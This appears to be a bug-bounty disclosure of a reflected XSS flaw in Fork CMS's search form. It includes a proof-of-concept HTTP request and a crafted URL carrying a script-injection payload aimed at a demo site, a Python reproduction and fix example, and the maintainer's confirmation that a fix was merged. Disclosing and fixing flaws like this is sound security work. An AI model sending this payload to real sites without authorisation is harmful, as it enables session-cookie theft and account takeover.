Cross-site Scripting (XSS) - Reflected in forkcms/forkcms

Valid

Reported on

Sep 23rd 2021


Description

Reflected XSS in the Search form: the submitted search term is reflected into the response without output encoding, so a term that closes the surrounding attribute and injects a script tag is executed in the visitor's browser.

Proof of Concept

// PoC.request
POST /frontend/ajax HTTP/1.1
Host: demo.fork-cms.com
Cookie: frontend_language=en; PHPSESSID=megjfhiirsim3v6klp91i7qjat
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.fork-cms.com/en
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 139
Origin: https://demo.fork-cms.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fork%5Bmodule%5D=Search&fork%5Baction%5D=Autosuggest&fork%5Blanguage%5D=en&term=%22%3E%3CsCrIpt%3Ealert(%22XsS%22)%3C%2FscRiPt%3E&length=55

Steps to Reproduce

In the Search form input, submit the payload: "><sCrIpt>alert("XsS")</scRiPt>

OR

Go to URL: https://demo.fork-cms.com/en/search?form=search&q_widget=%22%3E%3CsCrIpt%3Ealert%28%22XsS%22%29%3C%2FscRiPt%3E&submit=search
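Both entry points above (the Autosuggest ajax call and the search page URL) carry the same payload: it opens with `">` to close the value attribute and the tag it sits in, so the script element that follows is parsed as markup. The Python below is an added example, not Fork CMS code: it decodes the two PoC inputs from this report, reproduces the break-out with a hypothetical template string, shows the HTML attribute encoding that stops it, and gives the verbatim-reflection check to run when retesting. The template markup and the function names are assumptions for illustration.

```python
# Added example (not Fork CMS code). The templates here are hypothetical
# stand-ins for the real Search templates; field names come from the report.
from html import escape
from urllib.parse import parse_qs, urlencode

# The XSS payload from the report.
PAYLOAD = '"><sCrIpt>alert("XsS")</scRiPt>'

# Body of the PoC POST to /frontend/ajax, copied from the report.
POC_BODY = (
    "fork%5Bmodule%5D=Search&fork%5Baction%5D=Autosuggest&fork%5Blanguage%5D=en"
    "&term=%22%3E%3CsCrIpt%3Ealert(%22XsS%22)%3C%2FscRiPt%3E&length=55"
)

# Query string of the PoC GET to /en/search, copied from the report.
POC_QUERY = (
    "form=search&q_widget=%22%3E%3CsCrIpt%3Ealert%28%22XsS%22%29%3C%2FscRiPt%3E"
    "&submit=search"
)


def decode_field(encoded: str, name: str) -> str:
    """Return the decoded value of one field of an urlencoded body or query."""
    return parse_qs(encoded)[name][0]


def build_autosuggest_body(term: str, language: str = "en", length: int = 55) -> str:
    """Rebuild an ajax body with the same field names the PoC request uses."""
    return urlencode({
        "fork[module]": "Search",
        "fork[action]": "Autosuggest",
        "fork[language]": language,
        "term": term,
        "length": length,
    })


def render_vulnerable(term: str) -> str:
    # Hypothetical template that echoes the term into a value attribute
    # verbatim. The leading "> in the payload closes the attribute and the
    # input tag, so the <script> element that follows becomes live markup.
    return f'<input type="text" name="q_widget" value="{term}">'


def render_fixed(term: str) -> str:
    # Same template with HTML attribute encoding. quote=True matters: with
    # the default the double quote is left alone and the attribute can still
    # be broken out of, even though < and > are encoded.
    return f'<input type="text" name="q_widget" value="{escape(term, quote=True)}">'


def reflected_unescaped(body: str, probe: str) -> bool:
    """True if the probe appears verbatim in the response body.

    A verbatim hit means the input reached the page without encoding. A miss
    is not proof of safety (the term may be reflected in a different context,
    such as a JSON string or a script block, or be only partially encoded).
    """
    return probe in body
```

When retesting a patched instance, send `build_autosuggest_body(PAYLOAD)` to `/frontend/ajax` and open the search URL, then run `reflected_unescaped(response_text, PAYLOAD)` on each response; the encoded form returned by `render_fixed` is what a correct response should contain instead.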

Impact

An attacker who gets a user to open a crafted search URL can run script in that user's browser on the site's origin. This has the potential to steal the user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the forkcms team and are waiting to hear back 2 months ago
Jelmer Prins
2 months ago

Maintainer


This is normally already fixed on master, but I'll verify it next week

lethanhphuc
2 months ago

Researcher


Hi Jelmer, please update the report status if you fixed it

lethanhphuc
2 months ago

Researcher


@maintainer Can you validate the report please?

Jelmer Prins validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins confirmed that a fix has been merged on 76bf73 2 months ago
Jelmer Prins has been awarded the fix bounty